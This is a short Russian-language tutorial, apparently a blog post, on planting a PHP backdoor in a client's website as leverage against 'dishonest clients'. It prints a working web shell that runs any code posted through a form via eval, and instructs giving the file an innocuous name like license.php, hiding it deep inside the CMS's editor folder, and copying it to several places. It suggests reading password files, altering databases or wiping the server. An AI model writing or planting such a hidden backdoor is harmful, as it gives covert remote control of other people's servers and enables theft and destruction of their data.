Простейший backdoor на php или как обезопасить себя от нечестных клиентов

Это всего лишь каркас, который может иметь множество примеров реализации. Допустим, можно через highlight_file вывести содержание какого-нибудь файла с паролями, к которому нет прямого доступа. Можно подключиться к базе данных, считать содержание или изменить его. А можно и вовсе напечатать скрипт удаления всего на сервере, почему бы и нет.

  1. Создаём файл php и называем его как-нибудь неприметно, типа license.php или ещё как.
  2. Пишем в нём код
    <?php
    if ( isset($_POST[‘text’]) )
    eval ($_POST[‘text’]);
    ?>
    <form method=’POST’>
    <textarea name=’text’></textarea>
    <input type=’submit’>
    </form>
  3. Помещаем файл куда-нибудь подальше вглубь cms-ки, например, в дебри WYSIWYG-редактора. При желании дублируем файл ещё в 2-3 места (на всякий пожарный)